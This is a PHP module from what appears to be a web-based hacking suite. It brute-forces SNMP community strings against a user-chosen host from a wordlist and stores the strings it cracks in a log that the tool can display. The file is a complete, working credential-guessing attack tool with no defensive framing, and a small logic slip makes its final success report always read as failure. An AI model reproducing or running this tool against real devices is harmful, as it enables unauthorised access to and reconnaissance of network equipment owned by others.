<?php
/*
Handler for xSNMP

ModGlue Variables:
$_CONTEXT['thc_sn']['log']
$_CONTEXT['thc_sn']['results']['result']
$_CONTEXT['thc_sn']['results']['password']
$_CONTEXT['thc_sn']['oid']
$_CONTEXT['thc_sn']['version']
$_CONTEXT['thc_sn']['host']
$_CONTEXT['thc_sn']['keys']
$_CONTEXT['thc_sn']['wordlistname']
$_CONTEXT['thc_sn']['wordlist']
$_CONTEXT['thc_sn']['loginattempts']
$_CONTEXT['thc_sn']['result']
$_CONTEXT['thc_sn']['wordlistwords']
$_CONTEXT['thc_sn']['communitypass']
$_CONTEXT['thc_sn']['connect']
$_CONTEXT['thc_sn']['writetext']
$_CONTEXT['thc_sn']['data']
$_CONTEXT['thc_sn']['totaltime']
$_CONTEXT['thc_sn']['resultstring']

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 04-05-2024
*/
set_time_limit(0);
// set variable to be able to save a task
$_MODULE_C = "thc_sn";
$_CONTEXT['thc_sn'] = array();
include_once("../../Includes/screen_header.php");
include_once($_PATHS['functions_root']."/scrn.php");
$_CONTEXT['thc_sn']['log'] = $_PATHS['module_default_root']."/accounts.php";
$_CONTEXT['thc_sn']['results'] = array();
$_CONTEXT['thc_sn']['results']['result'] = false;
$_CONTEXT['thc_sn']['results']['password'] = false;
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
// template for screen file output
include_once($_PATHS['style_root']."/screen.php");
if(!function_exists("snmp2_open")){
	die(Screen($sOut."SNMP isn't enabled in your php configuration",$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(isset($_POST['submit'])){
	switch($_POST['submit']){
		// quick validation first of the input
		case"Generate Attack":
		if($_POST['sHost']==""){
			die(Screen($sOut."No host has been specified",$_CONTEXT['verbose'],$_CONTEXT['silent']));
		}
		$_CONTEXT['thc_sn']['oid'] = "SNMPv2-MIB::sysDescr.0";
		$_CONTEXT['thc_sn']['version'] = isset($_POST['sVersion']) && $_POST['sVersion']==1 ? 1 : 2;
		$_CONTEXT['thc_sn']['host'] = $_POST['sHost'];
		break;
		// View Passes
		case"View Passes":
		echo Screen($sOut,$_CONTEXT['verbose'],$_CONTEXT['silent']);
		if(!function_exists("RawToArray")){
			include_once($_PATHS['functions_root']."/raw_to_array.php");
		}
		if(false==($_CONTEXT['thc_sn']['keys'] = RawToArray($_CONTEXT['thc_sn']['log']))){
			echo Screen("<b id=h7>[no community strings discovered yet]</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
		}
		else{
			for($x=0;$x<count($_CONTEXT['thc_sn']['keys']);$x++){
				echo Screen("<b>".date($_CONTEXT['time_pattern'].' H:i:s',$_CONTEXT['thc_sn']['keys'][$x][0])."</b> community string for host <b>".$_CONTEXT['thc_sn']['keys'][$x][1]."</b> is <b>".$_CONTEXT['thc_sn']['keys'][$x][2]."</b><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
			}
		}
		exit;
		break;
		default:
		// default template
		die(Screen($sOut.$sOptions.$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
	}
}
else{
	die(Screen($sOut.$sOptions.$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_CONTEXT['thc_sn']['wordlistname'] = $_PATHS['wordlists_root']."/".ExploitFilter($_POST['sWordlist'],0,1);
if(false===($_CONTEXT['thc_sn']['wordlist'] = @file($_CONTEXT['thc_sn']['wordlistname']))){
	$_CONTEXT['errors'][] = array('error'=>'Wordlist doesn\'t exist','type'=>'0','fatal'=>'1','screen'=>'1','line'=>__LINE__,'file'=>__FILE__);
	include_once($_PATHS['end']);
}
include($_PATHS['includes_root']."/task_start.php");
echo Screen($sOut,$_CONTEXT['verbose'],$_CONTEXT['silent']);
echo Screen("<br />\n<b>Running..</b><p>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
flush();
ob_flush();
echo Screen("<b>trying to connect with ".htmlspecialchars($_POST['sHost']).":</b><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
flush();
ob_flush();
$_CONTEXT['thc_sn']['loginattempts'] = 0;
$_CONTEXT['thc_sn']['result'] = false;
if(false!==($_CONTEXT['thc_sn']['wordlistwords'] = @count($_CONTEXT['thc_sn']['wordlist']))){
	for($x=0;$x<$_CONTEXT['thc_sn']['wordlistwords'];$x++){
		// go through passwords
		$_CONTEXT['thc_sn']['communitypass'] = trim($_CONTEXT['thc_sn']['wordlist'][$x]);
		$_CONTEXT['thc_sn']['loginattempts']++;
		echo Screen("[".date('H:i:s',time())."] attempt ".$_CONTEXT['thc_sn']['loginattempts'].": ".$_CONTEXT['thc_sn']['communitypass']." =&gt; ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
		if(!$_CONTEXT['thc_sn']['connect'] = @snmp2_open($_CONTEXT['thc_sn']['host'],$_CONTEXT['thc_sn']['communitypass'],$_CONTEXT['thc_sn']['version'])){
			echo Screen("failed<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
		}
		else{
			echo Screen("success<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
			$_CONTEXT['thc_sn']['writetext'] = time()."|".$_CONTEXT['thc_sn']['host']."|".$_CONTEXT['thc_sn']['communitypass']."\n";
			$_CONTEXT['thc_sn']['result'] = true;
			if(!$_CONTEXT['thc_sn']['data'] = @snmp2_get($_CONTEXT['thc_sn']['connect'],$_CONTEXT['thc_sn']['oid'])){
				echo Screen("error retrieving snmp information<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
			}
			else{
				echo Screen("<p>".$_CONTEXT['thc_sn']['data']."</p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
			}
			@snmp2_close($_CONTEXT['thc_sn']['connect']);
			break;
		}
		flush();
		ob_flush();
	}
}
else{
	die(Screen("No data in wordlist",$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
// update entry in background task file
$_CONTEXT['thc_sn']['totaltime'] = time()-$_CONTEXT['start_task'];
$_CONTEXT['thc_sn']['resultstring'] = $_CONTEXT['thc_sn']['results']['result'] ? "successfully got password after ".$_CONTEXT['thc_sn']['loginattempts']." attempts in ".$_CONTEXT['thc_sn']['totaltime']."(s)" : "failed to get password, please try some different wordlist";
echo Screen(WriteF($_CONTEXT['thc_sn']['log'],$_CONTEXT['thc_sn']['writetext']) ? "<p>successfully logged password</p>" : "<p>failed to log password</p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
echo Screen($_CONTEXT['thc_sn']['resultstring'],$_CONTEXT['verbose'],$_CONTEXT['silent']);
include($_PATHS['includes_root']."/task_end.php");
echo Screen($sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']);
?>
